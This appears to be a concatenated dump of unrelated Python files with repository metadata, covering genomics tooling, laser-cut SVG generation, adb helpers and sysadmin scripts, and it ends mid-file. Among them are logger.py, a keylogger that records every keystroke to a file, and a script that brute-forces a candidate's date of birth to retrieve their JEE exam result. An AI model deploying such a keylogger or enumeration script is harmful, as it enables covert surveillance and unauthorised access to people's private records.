If start is specified, coordinates will be given relative to that position.
Assumes "hgsql" is installed and configured and available on the PATH.
Uses the hg38 database unless told otherwise.
All inputs must be trusted and not permitted to contain SQL injection.
"""
# Convert to 0-based not-end-inclusive coordinates.
start -= 1
# Get the name to look up in the database.
query_contig = get_ucsc_name(grc_id, alt_parent_grc_id)
# Spec out the query. TODO: Can I not say the database name constantly?
query_parts = ["SELECT \"", out_name, "\", ", db, ".knownGene.txStart - ",
start, ", ", db, ".knownGene.txEnd - ", start, ", ", db,
".kgXref.geneSymbol, 0, ", db, ".knownGene.strand FROM ", db,
".knownGene LEFT OUTER JOIN ", db, ".kgXref ON ", db,
".knownGene.name = ", db, ".kgXref.kgID WHERE ", db,
".knownGene.txStart != ", db, ".knownGene.cdsStart AND ", db,
".knownGene.chrom = \"", query_contig, "\" AND ", db,
".knownGene.txStart >= ", start]
if end is not None:
# Require the end criterion to be met too.
query_parts += [" AND ", db, ".knownGene.txEnd < ", end]
# Finish off the query.
query_parts.append(";")
# Put together the whole query.
query = "".join([str(part) for part in query_parts])
# Build the hgsql command line
args = ["hgsql", "-e", query]
# Open the process
process = subprocess.Popen(args, stdout=subprocess.PIPE)
for line in itertools.islice(process.stdout, 1, None):
# For all lines except the first, yield them because they are BED lines.
yield line
if process.wait() != 0:
raise RuntimeError("hgsql")
# We are done with this process.
process.stdout.close()
def open_gene_bed(region, sequence_id):
"""
Given the region name and the sequence ID ("ref" or "GI<whatever>") for a
sequence, give back an output file object to which a BED of the genes in
that sequence may be written.
"""
# Each bed goes in a folder named after its sequence, so hal2assemblyHub can
# use it.
bed_dir = "{}/genes/{}".format(region, sequence_id)
if not os.path.exists(bed_dir):
# Make sure we have a place to put the genes
os.makedirs(bed_dir)
# Open a bed file in there for writing and return it.
return open(bed_dir + "/genes.bed", "w")
def main(args):
"""
Parses command line arguments and do the work of the program.
"args" specifies the program arguments, with args[0] being the executable
name. The return value should be used as the program's exit code.
"""
if len(args) == 2 and args[1] == "--test":
# Run the tests
return doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
options = parse_args(args) # This holds the nicely-parsed options object
# Set Entrez e-mail
Entrez.email = options.email
# Go get the region of the reference we're talking about. Starts and ends
# are 1-based.
ref_acc, ref_start, ref_end = get_region_info(options.region,
options.assembly_url)
# Make our output directory
if not os.path.exists(options.region):
os.makedirs(options.region)
# We're going to write a chrom.sizes file with accessions (not the GI
# numbers) for the gff3->psl conversion step
acc_chrom_sizes = tsv.TsvWriter(open(options.region + "/acc.chrom.sizes",
"w"))
# Get the reference's GI
ref_gi = get_gi_number(ref_acc)
print("Reference for {} is GI{}:{}-{} 1-based".format(options.region,
ref_gi, ref_start, ref_end))
# Grab the reference sequence
ref_seq = get_sequence(ref_gi, ref_start, ref_end)
print("Got {}bp for a {}bp reference".format(len(ref_seq),
ref_end - ref_start + 1))
if len(ref_seq) > ref_end - ref_start + 1:
# Clip it down if it's too long. Assuming we have the correct sort of
# coordinates, and that we got served the data starting at the correct
# offset.
ref_seq = ref_seq[0:ref_end - ref_start + 1]
elif len(ref_seq) < ref_end - ref_start:
raise RuntimeError("Didn't get enough sequence from the API!")
# Change it to be just called "ref"
ref_seq.id = "ref"
# Write it to <region>/ref.fa
SeqIO.write([ref_seq], open("{}/ref.fa".format(options.region), "w"),
"fasta")
# Write a chromosome size entry for the reference by its accession
acc_chrom_sizes.line(ref_acc, get_length(ref_gi))
print("Writing genes for ref")
# Make a BED to put reference genes in
ref_bed = open_gene_bed(options.region, "ref")
for line in get_genes(ref_acc, "ref", ref_start, ref_end):
# Write all the BED lines for the appropriate region of the reference to
# that file.
ref_bed.write(line)
ref_bed.close()
for alt_acc, alt_unit in get_region_sequences(options.region,
options.assembly_url):
# For every alt in the region
# Get its GI number
alt_gi = get_gi_number(alt_acc)
print("Downloading alt GI{}".format(alt_gi))
# Grab the sequence data
alt_seq = get_sequence(alt_gi)
# Write it to <region>/GI<number>.fa
SeqIO.write([alt_seq], open("{}/GI{}.fa".format(options.region, alt_gi),
"w"), "fasta")
# Add this alt to the chromosome-sizes-by-accession file
acc_chrom_sizes.line(alt_acc, get_length(alt_gi))
# Sneak into the TSV writer and flush, so the sizes file can now be
# read.
acc_chrom_sizes.stream.flush()
# Where should we put the GFF alignment for this alt to the reference?
alt_gff3 = "{}/GI{}.gff3".format(options.region, alt_gi)
print("Downloading alignment")
# Go download it
download_gff3(ref_acc, alt_acc, alt_unit, options.assembly_url,
alt_gff3)
# And we need to convert that to PSL
alt_psl = "{}/GI{}.psl".format(options.region, alt_gi)
print("Converting to PSL")
# Run the conversion with the bit of the sizes file we have so far. We
# need to pass the chrom.sizes file twice now because gff3ToPsl has
# changed its interface.
subprocess.check_call(["gff3ToPsl", options.region + "/acc.chrom.sizes",
options.region + "/acc.chrom.sizes", alt_gff3, alt_psl])
# Edit the output to point to the GI instead of the accession
subprocess.check_call(["sed", "-i", "s/{}/GI{}/g".format(alt_acc,
alt_gi), alt_psl])
print("Writing genes for GI{}".format(alt_gi))
# Make a BED to put alt genes in
alt_bed = open_gene_bed(options.region, "GI{}".format(alt_gi))
for line in get_genes(alt_acc, "GI{}".format(alt_gi),
alt_parent_grc_id=ref_acc):
# Write all the BED lines for the alt to the file
alt_bed.write(line)
alt_bed.close()
# Now we need to do psl2maf, complete with globbing.
print("Creating GRC MAF")
# Find the psl2maf.py script
psl2maf = (os.path.dirname(os.path.realpath(__file__)) +
"/../mhc/psl2maf.py")
# Go call psl2maf, moving the reference stuff over to "ref" and shifting it
# back so that the first base we clipped out of the reference is 0,
# splitting apart mismatches, and making sure to use all the PSLs and MAFs
# in our output directory. We make sure to add 1 to the reference start in
# the offset, because some basedness-conversion needs to happen. TODO: Make
# this a function or make this use an import or somehow de-uglify it.
args = ([psl2maf, "--maf",
options.region + "/GRCAlignment.maf", "--referenceOffset",
str(-ref_start + 1), "--referenceSequence", "ref", "--noMismatch",
"--psls"] + glob.glob(options.region + "/*.psl") + ["--fastas"] +
glob.glob(options.region + "/*.fa"))
print("Calling: {}".format(" ".join(args)))
subprocess.check_call(args)
if __name__ == "__main__" :
sys.exit(main(sys.argv))
| [
"glenn.hickey@gmail.com"
] | glenn.hickey@gmail.com |
1da9516b8fceeaee1bfc89b3ac38f7c6d2cd0996 | ee8db8a13134cc19e4be22fa76de7232da777963 | /risers.py | 134eb1be2076ad78ed179f644a876471cec4fac8 | [
"MIT"
] | permissive | sile16/lasercut | 7bee1ed3ef67a486edd6f0eef4f53a11e116c467 | 55f88ffb9a693e2065a897ab469e68ee052459f6 | refs/heads/master | 2020-04-08T00:50:37.630998 | 2018-12-02T05:30:34 | 2018-12-02T05:30:34 | 158,869,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,081 | py | #p3 size 791mm x 384mm
#sculpteo 940mm x 590
import svgwrite
join_width = 5.9
color_width = 41
color_height = 96.475
panel_width = 940
panel_height = 590
shelf_width = 939
depth = 160
dwg = svgwrite.Drawing('risers.svg',size=(791,384))
stroke_width="0.01"
riser_height = 290
def slot(x,y):
dwg.add(dwg.line((x-join_width/2, y), (x-join_width/2, y+depth/2), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
dwg.add(dwg.line((x+join_width/2, y), (x+join_width/2, y+depth/2), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
dwg.add(dwg.line((x-join_width/2, y+depth/2), (x+join_width/2, y+depth/2), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
def shelf(x,y):
#top
dwg.add(dwg.line((x, y), (x+shelf_width, y), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
#left
dwg.add(dwg.line((x, y), (x, y+depth), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
curr_pos=0
for incr in range(0,int(shelf_width/color_width)):
curr_pos+=color_width
slot(curr_pos,y)
def riser(x,y):
#top
dwg.add(dwg.line((x, y), (x+riser_height, y), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
#left
dwg.add(dwg.line((x, y), (x, y+depth), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
#bottom line
dwg.add(dwg.line((x, y+depth), (x+riser_height, y+depth), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
#verticle right
dwg.add(dwg.line((x+riser_height, y), (x+riser_height, y+depth), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
slot(x+128.63,y)
for num_riser in range(0,int(panel_width/riser_height)):
riser(num_riser*riser_height,0)
for num_riser in range(0,int(panel_width/riser_height)):
riser(num_riser*riser_height,depth)
for num_riser in range(0,int(panel_width/riser_height)):
riser(num_riser*riser_height,depth*2)
#dwg.add(dwg.line((0, 0), (10, 0), stroke=svgwrite.rgb(0, 0, 255),stroke_width="0.01"))
#dwg.add(dwg.text('Test', insert=(0, 0.2), fill='red'))
dwg.save()
| [
"sile16@gmail.com"
] | sile16@gmail.com |
f5f9386957fc25339a4156a8f9ec345c579c46d1 | e6292e5c2bbf194f51f6ce0b67a5490c9707a011 | /cameraProcess.py | 11942607b34e21eb03280168f95db465644cc090 | [
"Apache-2.0"
] | permissive | daxiangpanda/face_merge | d5536b334638f8cf9f940c2cc61fa89b5a11fa1f | 601e1959412ac05c18a178a853a5214cbf2bc8c3 | refs/heads/master | 2020-04-11T22:02:05.269851 | 2018-12-17T12:00:15 | 2018-12-17T12:00:15 | 162,123,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,120 | py | import cv2
import core
import time
def fetch_frame(video_path):
video = cv2.VideoCapture(video_path)
success,image = video.read()
count = 0
frame_path_list = []
while success:
cv2.imwrite("image/frame%d.jpg" % count, image) # save frame as JPEG file \
# try:
start = time.time()
changeFace("image/frame%d.jpg" % count,"images/model_zbll.jpg")
print(time.time() - start)
# except Exception as e:
# count += 1
# continue
success,image = video.read()
frame_path_list.append("image/frame%d.jpg" % count)
count += 1
return frame_path_list
def changeFace(src_img,dst_img):
return core.face_merge_ret(src_img,dst_img)
cap = cv2.VideoCapture(0)
cap.set(3,640)
cap.set(4,480)
cap.set(1, 10.0)
while True:
ret,frame = cap.read()
if ret == True:
frame = cv2.flip(frame, 1)
# a = out.write(frame)
cv2.imshow("frame", changeFace(frame,"images/model_zbll.jpg"))
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
| [
"xinzhongliu@sohu-inc.com"
] | xinzhongliu@sohu-inc.com |
75b5bd8ac9fb5f7069eba6b2d14f6f357893d43f | 3ac988c7f21de80e4afe2f0ec86c56e5430647b1 | /out/production/leetcode/python/35.py | 9aa56e79aba3e880a42a3bb67236902ad7f23e97 | [] | no_license | seektruth/leetcode-solutions | 623cf8f87420dc176eecf8df90687a800ab41f2b | 9489c4c71e551958686d222e5617c879fe06d6d4 | refs/heads/master | 2021-01-17T18:15:01.621661 | 2017-07-31T02:26:37 | 2017-07-31T02:26:37 | 62,996,328 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | import bisect
class Solution(object):
def searchInsert(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
return bisect.bisect_left(nums, target)
a = Solution()
print a.searchInsert([], 2)
| [
"smiling_man@163.com"
] | smiling_man@163.com |
e29538e65e3f1342c183463884e05200eba1d3f2 | 111396146b5004f6c46ee69b6a7384a77de400fa | /student_register/migrations/0001_initial.py | 408535b0b43fb91601f4d8546b30e9f7200355d7 | [] | no_license | samfubuki/Logiin-and-CRUD-urls-using-django | 81aef1037cd31ae626b92b4d5beb681dbd387374 | 67c3adbc9029e5778cb37d68d38c5884f013e6b8 | refs/heads/master | 2022-08-03T19:55:29.433122 | 2020-05-28T08:35:52 | 2020-05-28T08:35:52 | 267,505,241 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,054 | py | # Generated by Django 3.0.6 on 2020-05-19 12:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Stream',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fullname', models.CharField(max_length=200)),
('stu_code', models.CharField(max_length=200)),
('mobile', models.CharField(max_length=200)),
('stream', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='student_register.Stream')),
],
),
]
| [
"pbhardwaj.preet@gmail.com"
] | pbhardwaj.preet@gmail.com |
6a1b9b2699b5d40ab586304e0361f170ab18ac56 | ed8cdcce521b8cab33c66f716c0886e17f035d21 | /.history/public/publicfunction_20191221202740.py | 99378bfc5a5a438a74f015f442e55bdf06ce5ce6 | [] | no_license | deancsdfy/AndroidPerformanceTool_windows | 8ac35729bc651c3af551f090d6788b6ee3f17eb5 | c4906aa9347e8e5eca68dbb7cf2d66a327c70d1f | refs/heads/master | 2020-11-27T20:38:55.014228 | 2020-01-09T15:55:52 | 2020-01-09T15:55:52 | 229,593,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,646 | py | #coding=utf-8
import os,platform
import subprocess
import re
serialno_num=''
#判断系统类型,windows使用findstr,linux使用grep
system = platform.system()
if system is "Windows":
find_util = "findstr"
else:
find_util = "grep"
#判断是否设置环境变量ANDROID_HOME
# if "ANDROID_HOME" in os.environ:
# if system == "Windows":
# command = os.path.join(os.environ["ANDROID_HOME"], "platform-tools", "adb.exe")
# else:
# command = os.path.join(os.environ["ANDROID_HOME"], "platform-tools", "adb")
# else:
# raise EnvironmentError(
# "Adb not found in $ANDROID_HOME path: %s." %os.environ["ANDROID_HOME"])
#获取手机
def get_devices():
devices=[]
result = subprocess.Popen("adb devices", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.readlines()
for line in result[1:]:
if 'device' in line.strip():
devices.append(line.split()[0])
else:
break
return devices
#adb命令
def adb(args):
# global serialno_num
# if serialno_num == "":
# devices = get_devices()
# if len(devices) == 1:
# serialno_num = devices[0]
# else:
# raise EnvironmentError("more than 1 device")
cmd = "adb %s" %(str(args))
return os.popen(cmd)
#adb shell命令
def shell(args):
# global serialno_num
# if serialno_num == "":
# devices = get_devices()
# serialno_num = devices[0]
cmd = '\'adb shell \"%s\"\'' %( str(args))
print(cmd)
# cmd = str(args)
return subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def get_current_packagename():
#正则匹配出package和activity
pattern = re.compile(r"[a-zA-Z0-9\.]+/.[a-zA-Z0-9\.]+")
# package = shell('adb shell "dumpsys activity top| grep ACTIVITY"').stdout.read()
package = shell('dumpsys activity top| grep ACTIVITY').stdout.read()
#用-1,是因为部分机型上,还会返回一些系统进程和包,比如小米8
print(pattern.findall(package.decode())[-1].split('/')[0])
# return pattern.findall(package.decode())[-1].split('/')[0]
def get_current_activity():
#正则匹配出package和activity
pattern = re.compile(r"[a-zA-Z0-9\.]+/.[a-zA-Z0-9\.]+")
#新的adb命令行,这个已经取不到activity了
# package = shell('dumpsys activity top| grep ACTIVITY').stdout.read()
# print(pattern.findall(package.decode())[-1].split('/')[1])
# return pattern.findall(package.decode())[-1].split('/')[1]
if __name__ == "__main__":
get_current_activity()
get_current_packagename() | [
"denacsdfy@gmail.com"
] | denacsdfy@gmail.com |
44e6b8f039039cca59ab829d78f56f8e1e0dcf77 | cc5fa752265dcb47ffab721f1a818413b77725d6 | /logger.py | 1c43a16b215da849cefcdbbb353820d733270af2 | [] | no_license | phsm99/keylogger | 9d9602033a72f1c4105facbd60af23a24f9f9b74 | 1090e8a024b19786ae4e1f516ef669073a20d2d2 | refs/heads/master | 2021-01-15T00:44:22.954431 | 2020-02-24T18:59:26 | 2020-02-24T18:59:26 | 242,817,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 861 | py | try:
from pynput import keyboard
except ImportError:
import subprocess
subprocess.call(['pip', 'install', 'pynput'])
from pynput import keyboard
def write_on_file(string):
try:
file = open('log.txt', 'a+', encoding='utf-8')
except:
print('Erro abrir arquivo de saída')
raise
file.write('\n{0}'.format(string))
file.close()
def on_press(key):
try:
current_key = str(key.char)
except AttributeError:
if key == key.space:
current_key = " "
else:
current_key = " " + str(key) + " "
write_on_file(current_key)
def start():
keyboard_listener = keyboard.Listener(on_press=on_press)
with keyboard_listener:
keyboard_listener.join()
if __name__ == "__main__":
print('Listening')
start()
| [
"noreply@github.com"
] | noreply@github.com |
3abf4e446f31266763a2fe710d62337e05dd91a8 | c21faf85627b1cfd96494aac73cc40e5f11ebb46 | /results/test_330.py | 8be1918b363f41265b49b7e3247f2554e04979da | [] | no_license | ekkya/Cyclomatic-Complexity | d02c61e009087e7d51738e60605875741532b878 | 172db2efdd974f5abad964e335552aec974b47cb | refs/heads/master | 2021-08-28T17:13:14.718314 | 2017-12-12T22:04:13 | 2017-12-12T22:04:13 | 112,042,202 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 73,382 | py | """Get the number of each character in any given text.
Inputs:
A txt file -- You will be asked for an input file. Simply input the name
of the txt file in which you have the desired text.
"""
import pprint
import collections
def main():
file_input = input('File Name: ')
with open(file_input, 'r') as info:
count = collections.Counter(info.read().upper())
value = pprint.pformat(count)
print(value)
if __name__ == "__main__":
main()# Script Name : pscheck.py
# Author : Craig Richards
# Created : 19th December 2011
# Last Modified : 17th June 2013
# Version : 1.1
# Modifications : 1.1 - 17/06/13 - CR - Changed to functions, and check os before running the program
# Description : Process check on Nix boxes, diplsay formatted output from ps command
import commands, os, string
def ps():
program = raw_input("Enter the name of the program to check: ")
try:
#perform a ps command and assign results to a list
output = commands.getoutput("ps -f|grep " + program)
proginfo = string.split(output)
#display results
print "\n\
Full path:\t\t", proginfo[5], "\n\
Owner:\t\t\t", proginfo[0], "\n\
Process ID:\t\t", proginfo[1], "\n\
Parent process ID:\t", proginfo[2], "\n\
Time started:\t\t", proginfo[4]
except:
print "There was a problem with the program."
def main():
if os.name == "posix": # Unix/Linux/MacOS/BSD/etc
ps() # Call the function
elif os.name in ("nt", "dos", "ce"): # if the OS is windows
print "You need to be on Linux or Unix to run this"
if __name__ == '__main__':
main()from bs4 import BeautifulSoup
import datetime
import mechanize
import urllib2
# Create a Browser
b = mechanize.Browser()
# Disable loading robots.txt
b.set_handle_robots(False)
b.addheaders = [('User-agent',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;)')]
# Navigate
b.open('http://cbseresults.nic.in/jee/jee_2015.htm')
# Choose a form
b.select_form(nr=0)
# Fill it out
b['regno'] = '37000304'
currentdate = datetime.date(1997,3,10)
enddate = datetime.date(1998,4,1)
while currentdate <= enddate:
ct=0
#print currentdate
yyyymmdd = currentdate.strftime("%Y/%m/%d")
ddmmyyyy = yyyymmdd[8:] + "/" + yyyymmdd[5:7] + "/" +yyyymmdd[:4]
print(ddmmyyyy)
b.open('http://cbseresults.nic.in/jee/jee_2015.htm')
b.select_form(nr=0)
b['regno'] = '37000304'
b['dob'] = ddmmyyyy
fd = b.submit()
#print(fd.read())
soup = BeautifulSoup(fd.read(),'html.parser')
for writ in soup.find_all('table'):
ct = ct + 1;
#print (ct)
if ct == 6:
print("---fail---")
else:
print("--true--")
break;
currentdate += datetime.timedelta(days=1)
#print fd.read()# Script Name : new_script.py
# Author : Craig Richards
# Created : 20th November 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This will create a new basic template for a new script
import os # Load the library module
import sys # Load the library module
import datetime # Load the library module
text = '''You need to pass an argument for the new script you want to create, followed by the script name. You can use
-python : Python Script
-bash : Bash Script
-ksh : Korn Shell Script
-sql : SQL Script'''
if len(sys.argv) < 3:
print text
sys.exit()
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv:
print text
sys.exit()
else:
if '-python' in sys.argv[1]:
config_file = "python.cfg"
extension = ".py"
elif '-bash' in sys.argv[1]:
config_file = "bash.cfg"
extension = ".bash"
elif '-ksh' in sys.argv[1]:
config_file = "ksh.cfg"
extension = ".ksh"
elif '-sql' in sys.argv[1]:
config_file = "sql.cfg"
extension = ".sql"
else:
print 'Unknown option - ' + text
sys.exit()
confdir = os.getenv("my_config")
scripts = os.getenv("scripts")
dev_dir = "Development"
newfile = sys.argv[2]
output_file = (newfile + extension)
outputdir = os.path.join(scripts,dev_dir)
script = os.path.join(outputdir, output_file)
input_file = os.path.join(confdir,config_file)
old_text = " Script Name : "
new_text = (" Script Name : " + output_file)
if not(os.path.exists(outputdir)):
os.mkdir(outputdir)
newscript = open(script, 'w')
input = open(input_file, 'r')
today = datetime.date.today()
old_date = " Created :"
new_date = (" Created : " + today.strftime("%d %B %Y"))
for line in input:
line = line.replace(old_text, new_text)
line = line.replace(old_date, new_date)
newscript.write(line)
# Script Name : osinfo.py
# Authors : {'geekcomputers': 'Craig Richards', 'dmahugh': 'Doug Mahugh','rutvik1010':'Rutvik Narayana Nadimpally','y12uc231': 'Satyapriya Krishna', 'minto4644':'Mohit Kumar'}
# Created : 5th April 2012
# Last Modified : July 19 2016
# Version : 1.0
# Modification 1 : Changed the profile to list again. Order is important. Everytime we run script we don't want to see different ordering.
# Modification 2 : Fixed the AttributeError checking for all properties. Using hasttr().
# Modification 3 : Removed ': ' from properties inside profile.
# Description : Displays some information about the OS you are running this script on
import platform as pl
profile = [
'architecture',
'linux_distribution',
'mac_ver',
'machine',
'node',
'platform',
'processor',
'python_build',
'python_compiler',
'python_version',
'release',
'system',
'uname',
'version',
]
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
for key in profile:
if hasattr(pl,key):
print(key + bcolors.BOLD + ": "+ str(getattr(pl,key)())+ bcolors.ENDC)
import csv
import glob
import os
import pdb
import pandas as pd
def main():
directory = []
for dirs in os.walk("."):
directory.append(dirs)
folders = directory[0][1]
for ff in folders:
if ff != ".git":
allFiles = glob.glob(ff + "/*.csv")
frame = pd.DataFrame()
dfs = []
for files in allFiles:
df = pd.read_csv(files, index_col=None, header=0)
dfs.append(df)
frame = pd.concat(dfs)
frame.to_csv(ff + "/results.csv")
main()# Script Name : logs.py
# Author : Craig Richards
# Created : 13th October 2011
# Last Modified : 14 February 2016
# Version : 1.2
#
# Modifications : 1.1 - Added the variable zip_program so you can set it for the zip program on whichever OS, so to run on a different OS just change the locations of these two variables.
# : 1.2 - Tidy up comments and syntax
#
# Description : This script will search for all *.log files in the given directory, zip them using the program you specify and then date stamp them
import os # Load the Library Module
from time import strftime # Load just the strftime Module from Time
logsdir = "c:\puttylogs" # Set the Variable logsdir
zip_program = "zip.exe" # Set the Variable zip_program - 1.1
for files in os.listdir(logsdir): # Find all the files in the directory
if files.endswith(".log"): # Check to ensure the files in the directory end in .log
files1 = files + "." + strftime("%Y-%m-%d") + ".zip" # Create the Variable files1, this is the files in the directory, then we add a suffix with the date and the zip extension
os.chdir(logsdir) # Change directory to the logsdir
os.system(zip_program + " " + files1 +" "+ files) # Zip the logs into dated zip files for each server. - 1.1
os.remove(files) # Remove the original log files# Script Name : check_for_sqlite_files.py
# Author : Craig Richards
# Created : 07 June 2013
# Last Modified : 14 February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Remove unecessary line and variable on Line 21
# Description : Scans directories to check if there are any sqlite files in there
import os
def isSQLite3(filename):
from os.path import isfile, getsize
if not isfile(filename):
return False
if getsize(filename) < 100: # SQLite database file header is 100 bytes
return False
else:
Header = open(filename, 'rb').read(100)
fd.close()
if Header[0:16] == 'SQLite format 3\000':
return True
else:
return False
log=open('sqlite_audit.txt','w')
for r,d,f in os.walk(r'.'):
for files in f:
if isSQLite3(files):
print files
print "[+] '%s' **** is a SQLITE database file **** " % os.path.join(r,files)
log.write("[+] '%s' **** is a SQLITE database file **** " % files+'\n')
else:
log.write("[-] '%s' is NOT a sqlite database file" % os.path.join(r,files)+'\n')
log.write("[-] '%s' is NOT a sqlite database file" % files+'\n')
# Script Name : create_dir_if_not_there.py
# Author : Craig Richards
# Created : 09th January 2012
# Last Modified : 22nd October 2015
# Version : 1.0.1
# Modifications : Added exceptions
# : 1.0.1 Tidy up comments and syntax
#
# Description : Checks to see if a directory exists in the users home directory, if not then create it
import os # Import the OS module
try:
home = os.path.expanduser("~") # Set the variable home by expanding the users set home directory
print home # Print the location
if not os.path.exists(home + '/testdir'):
os.makedirs(home + '/testdir') # If not create the directory, inside their home directory
except Exception, e:
print e# Script Name : move_files_over_x_days.py
# Author : Craig Richards
# Created : 8th December 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This will move all the files from the src directory that are over 240 days old to the destination directory.
import shutil
import sys
import time
import os
src = 'u:\\test' # Set the source directory
dst = 'c:\\test' # Set the destination directory
now = time.time() # Get the current time
for f in os.listdir(src): # Loop through all the files in the source directory
if os.stat(f).st_mtime < now - 240 * 86400: # Work out how old they are, if they are older than 240 days old
if os.path.isfile(f): # Check it's a file
shutil.move(f, dst) # Move the files
# Script Name : sqlite_table_check.py
# Author : Craig Richards
# Created : 07 June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Checks the main SQLITE database to ensure all the tables should exist
import sqlite3
import sys
import os
dropbox = os.getenv("dropbox")
config = os.getenv("my_config")
dbfile = ("Databases\jarvis.db")
listfile = ("sqlite_master_table.lst")
master_db = os.path.join(dropbox, dbfile)
config_file = os.path.join(config, listfile)
tablelist = open(config_file,'r');
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute('SELECT SQLITE_VERSION()')
data = cursor.fetchone()
if str(data) == "(u'3.6.21',)":
print ("\nCurrently " + master_db + " is on SQLite version: %s" % data + " - OK -\n")
else:
print ("\nDB On different version than master version - !!!!! \n")
conn.close()
print ("\nCheckling " + master_db + " against " + config_file + "\n")
for table in tablelist.readlines():
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute("select count(*) from sqlite_master where name = ?",(table.strip(), ))
res = cursor.fetchone()
if (res[0]):
print ('[+] Table : ' + table.strip() + ' exists [+]')
else:
print ('[-] Table : ' + table.strip() + ' does not exist [-]')
# Script Name : puttylogs.py
# Author : Craig Richards
# Created : 13th October 2011
# Last Modified : 29th February 2012
# Version : 1.2
# Modifications : 1.1 - Added the variable zip_program so you can set it for the zip program on whichever OS, so to run on a different OS just change the locations of these two variables.
# : 1.2 - 29-02-12 - CR - Added shutil module and added one line to move the zipped up logs to the zipped_logs directory
# Description : Zip up all the logs in the given directory
import os # Load the Library Module
import shutil # Load the Library Module - 1.2
from time import strftime # Load just the strftime Module from Time
logsdir="c:\logs\puttylogs" # Set the Variable logsdir
zipdir="c:\logs\puttylogs\zipped_logs" # Set the Variable zipdir - 1.2
zip_program="zip.exe" # Set the Variable zip_program - 1.1
for files in os.listdir(logsdir): # Find all the files in the directory
if files.endswith(".log"): # Check to ensure the files in the directory end in .log
files1=files+"."+strftime("%Y-%m-%d")+".zip" # Create the Variable files1, this is the files in the directory, then we add a suffix with the date and the zip extension
os.chdir(logsdir) # Change directory to the logsdir
os.system(zip_program + " " + files1 +" "+ files) # Zip the logs into dated zip files for each server. - 1.1
shutil.move(files1, zipdir) # Move the zipped log files to the zipped_logs directory - 1.2
os.remove(files) # Remove the original log files
# Script Name : daily_checks.py
# Author : Craig Richards
# Created : 07th December 2011
# Last Modified : 01st May 2013
# Version : 1.5
#
# Modifications : 1.1 Removed the static lines for the putty sessions, it now reads a file, loops through and makes the connections.
# : 1.2 Added a variable filename=sys.argv[0] , as when you use __file__ it errors when creating an exe with py2exe.
# : 1.3 Changed the server_list.txt file name and moved the file to the config directory.
# : 1.4 Changed some settings due to getting a new pc
# : 1.5 Tidy comments and syntax
#
# Description : This simple script loads everything I need to carry out the daily checks for our systems.
import platform # Load Modules
import os
import subprocess
import sys
from time import strftime # Load just the strftime Module from Time
def clear_screen(): # Function to clear the screen
if os.name == "posix": # Unix/Linux/MacOS/BSD/etc
os.system('clear') # Clear the Screen
elif os.name in ("nt", "dos", "ce"): # DOS/Windows
os.system('CLS') # Clear the Screen
def print_docs(): # Function to print the daily checks automatically
print ("Printing Daily Check Sheets:")
# The command below passes the command line string to open word, open the document, print it then close word down
subprocess.Popen(["C:\\Program Files (x86)\Microsoft Office\Office14\winword.exe", "P:\\\\Documentation\\Daily Docs\\Back office Daily Checks.doc", "/mFilePrintDefault", "/mFileExit"]).communicate()
def putty_sessions(): # Function to load the putty sessions I need
for server in open(conffilename): # Open the file server_list.txt, loop through reading each line - 1.1 -Changed - 1.3 Changed name to use variable conffilename
subprocess.Popen(('putty -load '+server)) # Open the PuTTY sessions - 1.1
def rdp_sessions():
print ("Loading RDP Sessions:")
subprocess.Popen("mstsc eclr.rdp") # Open up a terminal session connection and load the euroclear session
def euroclear_docs():
# The command below opens IE and loads the Euroclear password document
subprocess.Popen('"C:\\Program Files\\Internet Explorer\\iexplore.exe"' '"file://fs1\pub_b\Pub_Admin\Documentation\Settlements_Files\PWD\Eclr.doc"')
# End of the functions
# Start of the Main Program
def main():
filename = sys.argv[0] # Create the variable filename
confdir = os.getenv("my_config") # Set the variable confdir from the OS environment variable - 1.3
conffile = ('daily_checks_servers.conf') # Set the variable conffile - 1.3
conffilename = os.path.join(confdir, conffile) # Set the variable conffilename by joining confdir and conffile together - 1.3
clear_screen() # Call the clear screen function
# The command below prints a little welcome message, as well as the script name, the date and time and where it was run from.
print ("Good Morning " + os.getenv('USERNAME') + ", "+
